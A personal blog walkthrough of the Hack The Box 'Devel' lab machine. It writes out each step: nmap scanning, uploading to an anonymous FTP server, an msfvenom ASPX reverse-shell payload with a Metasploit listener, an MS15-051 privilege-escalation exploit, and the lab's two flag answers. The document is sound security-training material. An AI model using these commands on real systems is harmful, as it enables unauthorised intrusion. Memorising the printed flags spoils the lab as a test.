Jasper Alblas
Hack The Box: Devel – Walkthrough (Guided Mode)
Hi! It is time to look at the Devel machine on Hack The Box. This challenge has it all: NMap, Metasploit, remote code execution and exploits. Let’s have fun!
This machine is currently free to play to promote the new guided mode that HTB offers on retired easy machines.
Machine URL: https://app.hackthebox.com/machines/Devel
I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by HTBs machine.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Table of Contents Devel
1: What is the name of the service is running on TCP port `21` on the target machine?
It’s time to get started. Let’s start up a Pwnbox or if you prefer connect to the machine by using OpenVPN.
As always, to find out the open ports we can use Nmap. Use the following command:
nmap -sV -sC -v <target ip>The argument –sV does version detection, –sC runs some basic scripts, while -v adds some more logging. This should be enough to get started.
You should see two open ports.
We got two open ports: port 21 running a FTP service, and port 80 running HTTP (Hypertext Transfer Protocol). It is the default port used to send and receive unencrypted web pages.
If we visit the web service in the browser, we can see we got IIS 7 running.
We will look more at this later.
The task relates to port 21, and we can observer that it is running Microsoft ftpd, a Windows implementation of a ftp service. Also important, it mentions that the service allows anonymous access. More on this in a moment.
What is the name of the service is running on TCP port `21` on the target machine?
Answer: Microsoft ftpd
2: Which basic FTP command can be used to upload a single file onto the server?
Let’s move on!
We can try accessing the FTP anonymously:
ftp anonymous@10.10.10.5Just press enter when asked for a password. You will get access. Enter dir to get a list of files on the FTP service.
We see a bunch of files, including some reverse shells, but also some related to the IIS service. Let’s have a look around. Files can be download to your machine by using the get command.
Quick note: A lot of files disappeared from the FTP the following morning when I was writing this article. It seems to be files uploaded by other users. You will probably only see the image file and some IIS related files.
If we have a look at the welcome.png image, it looks like the same image of the web page. Could the files be accessible from the web page we found earlier? Let’s try and visit the welcome.png file in the browser.
Yes, we can! The same goes for other files:
And there are even some reverse shells (ASPX).
Turns out, this is an extreme vulnerability. We call this Remote Code Execution.
The FTP server might allow us to upload our own reverse shells to the server, which we then can run by entering the url to the file in the browser.
Note: Other webshells, such as the .php files, are quite useless here as we are visiting a ASP web server, and not Apache. PHP scripts are turned of by default.
We can upload files to the ftp server by using the put command. Let’s see if this works. We can quickly create a file with the touch command, and echoing some contents to it. Afterwards, we can put it into the ftp service.
And sure enough it works!
2. Which basic FTP command can be used to upload a single file onto the server?
Answer: put
3. Are files put into the FTP root available via the webserver?
This one we answer before. We can access files within the FTP root via the webserver.
3. Are files put into the FTP root available via the webserver?
Answer: yes
Task 4. What file extension is executed as a script on this webserver? Don’t include the `.`.
The way forward is clear now. We need to upload a payload (to gain a reverse shell) and run it through the webserver. We can find a payload and upload it to the server.
I found one here:
https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx
You can then simply edit the host IP address and port number in the script.
You can alternatively also create one with msfvenom. For Windows hosts, a commonly used payload is windows/meterpreter/reverse_tcp.
You can create a payload with the following line:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your attacker tun0 IP4> LPORT=6969 -f aspx > payload.aspxYou should see the payload.aspx file on your machine.
Now login to the FTP by using the previously used command:
ftp anonymous@10.10.10.5And enter:
put payload.aspxNow we should be able to run the payload through the webserver, but first we have to startup a reverse listener through msfconsole. Run the following commands in order:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 6969
run
Now the listener is running. Proceed by executing the payload file by accessing it in your browser:
We got a reverse shell! And we also confirmed the answer on this task’s question: aspx. We used a payload of this filetype to gain access a reverse shell.
4. What file extension is executed as a script on this webserver? Don’t include the `.`.
Answer: aspx
5. Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?
Let’s move on and find a way to escalate our privileges. The question points us in the right direction. I quickly found out that there is a module called local_exploit_suggester, which we can run to escalate privileges.
We can run this through our active meterpreter shell, which also can run all other types of commands, such as sysinfo:
And getuid:
But anyway, back to the answer:
Answer: local_exploit_suggester
Submit the flag located on the babis user’s desktop.
Now let’s get those flags!
We can run the previously mentioned module with the following command:
run post/multi/recon/local_exploit_suggesterThe module finds a bunch of exploits. Tasty!
I had success with the client_copy_image exploit. Now follow my lead:
- First background (Control + Z) your meterpreter shell.
- Note the session ID, we will need it in a moment.
- Activate the module
use exploit/windows/local/ms15_051_client_copy_image4. Show the settings we have to set
show options5. Set the session to your backgrounded session. This is the only required option that is not set.
set SESSION <your session id>
6. Now run the exploit:
runThat should do it!
We got escalated privileges!! YAY!
Now finally enter shell to get access to a normal window cmd.
Now we just have to find the babis user directory. Change directories to c:\users and you will find the babis directory.
Proceed by entering the desktop:
Read the user.txt file by using type:
Submit the flag located on the babis user’s desktop.
Answer: e51e6175b46521de4efcac86020fe403
Submit the flag located on the administrator’s desktop.
Now do the same for the administrator’s flag.
Submit the flag located on the administrator’s desktop.
Answer: 592657ada41522d08bda65feb0a4186e
Congratulations
Great job. We are done! I hope you learned a bunch about using nmap, metasploit and reverse shells. Find more of my walkthroughs here.
Like my articles?
You are welcome to share my article with friends 🙂
I would be even more grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:
https://referral.hackthebox.com/mzwwXlg
Happy Hacking!
